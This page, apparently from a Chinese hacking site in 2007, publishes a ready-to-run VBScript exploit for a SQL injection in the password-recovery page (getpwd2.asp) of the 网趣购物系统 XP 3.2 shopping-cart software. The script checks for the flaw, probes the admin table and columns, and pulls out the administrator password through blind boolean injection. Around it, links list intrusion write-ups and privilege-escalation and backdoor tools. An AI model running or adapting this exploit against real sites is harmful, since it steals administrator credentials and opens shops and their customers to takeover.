·	没有路由密码权限时的鸽	08-23	·	上网安全 Vista自我防范	10-11
·	让濒临崩溃的Windows XP	10-11	·	有备无患，快速自制救急	10-11
·	要你好看!Windows看图工	10-11	·	空间赞助网提供不同类型	10-11
·	讨论net.exe和net1.exe的	10-10	·	让3389远程桌面传输更通	10-10
·	巧妙入侵渗透赌博站	10-10	·	Aspx空间扫权限工具	10-10
·	Windows2003最新提权工具	10-10	·	易淘乐提供100M免费全能	10-10
·	系统开机密码忘了不着急	10-09	·	中意网络提供免费100M免	10-09
·	与众不同 Windows XP开始	10-08	·	让桌面图标翻跟斗在XP上	10-08
·	上海宽元站长资助计划-提	10-08	·	个性化Windows XP的任务	10-07
·	趣盘提供3G免费网络硬盘	10-07	·	秀山热线提供200MB免费全	10-07
·	一次艰辛的提权过程	10-06	·	成功入侵IT大卖场的渗透	10-06
·	mysqlhack- MYSQL利用工	10-06	·	lanker一句话PHP后门客户	10-06
·	WIXI提供3G免费多媒体网	10-06	·	新人网络提供100M/ftp免	10-06
·	如何利用QQ带来高流量	10-05	·	UuShare提供免费网络文件	10-05

[组图]网趣购物系统XP 3.2注入漏洞

热荐 ★★★★★

网趣购物系统XP 3.2注入漏洞

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-11-6 10:46:29

'Code by Tr4c3@126.com
On Error Resume Next
Dim strUrl,strRight
Set objArgs = WScript.Arguments
If objArgs.Count<>1 Then
WScript.Echo "网趣购物系统XP V3.2版注入工具 By Tr4c3[at]126[dot]CoM"
WScript.Echo "用于默认配置的猜解，默认管理员admin,adminid=1"
WScript.Echo "Usage:Cscript getpass.vbs www.tr4c3.com"
WScript.Quit
Else
strUrl = "http://"&objArgs(0)&"/getpwd2.asp"
strFalse="注册" '特征字符
End If

'检查是否存在注入
If xPosts("username='+or+1=1+and+''='")=True And xPosts("username='+or+1=2+and+''='")=False Then
WScript.Echo "存在注入..."
Else
WScript.Echo "不存在注入..."
WScript.Quit
End if

'检查表
If xPosts("username='+or+0<>(select+count(*)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在wq_admin表..."
Else
WScript.Echo "不存在wq_admin表，退出！请手工校验。"
WScript.Quit
End if

'检查字段
If xPosts("username='+or+0<>(select+count(admin)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在字段admin..."
Else
WScript.Echo "不存在字段admin，退出！请手工校验。"
WScript.Quit
End If
If xPosts("username='+or+0<>(select+count(password)+from+wq_admin)+and+''='")=True Then
WScript.Echo "存在字段password,开始猜解密码..."
Else
WScript.Echo "不存在字段password，退出！请手工校验。"
WScript.Quit
End if

'猜测密码
pass = ""
strings = "0123456789abcdefghijklmnopqrstuvwxyz"
For j = 1 To 16 Step 1
For k = 1 to len(strings) step 1
If xPosts("username='+or+(select+left(password,"&j&")+from+wq_admin+where+adminid=1)='"&pass&mid(strings,k,1)&"'+and+''='")=True Then
pass = pass & mid(strings,k,1)
exit For
End If
Next
Next

If error Then
WScript.Echo "error:" & Error.Description
Error.Clear
Else
WScript.Echo "Password=" & pass
Wscript.Quit
End If

'---------------------------------------------------------------------------------------
'Code by NP
Function bytes2BSTR(vIn)
strReturn = ""
For i = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i = i + 1
End If
Next
bytes2BSTR = strReturn
End Function
'-----------------------------------------------------------------------------------------
Function xPosts(strSql)
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.open "POST",strUrl,False
xPost.setRequestHeader "Content-Type","Application/x-www-form-urlencoded"
xPost.send strSql
data=bytes2BSTR(xPost.responseBody)
If InStr(data,strFalse)=0 Then
xPosts=True
Else
xPosts=False
End if
End function

上一页 [1] [2]

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：动易网站管理系统vote.asp页面存在SQL注入漏洞

下一篇文章：网软天下企业网站管理系统cookies注入漏洞

【字体：小大】

中介交易区

实例讲解跨站入侵攻防战之攻击篇	05-08
对偶偶娱乐分站服务器的安全检测	04-23
入侵88red系统的详细过程	04-07
对趋势科技等数万网站被攻击的分	03-21
凡人网络购物系统 V8.0 简体中文	03-18
linux平台下渗透日本著名XXXXXX.	03-18
搜索框所引起的XSS漏洞	03-05
跳转漏洞的利用	03-05
对复旦大学的一次漫长渗透	03-03
.net一句话马以及dx论坛拿shell	03-01
php渗透入侵过程图文详解	03-01
DJ网站的入侵详细过程	02-26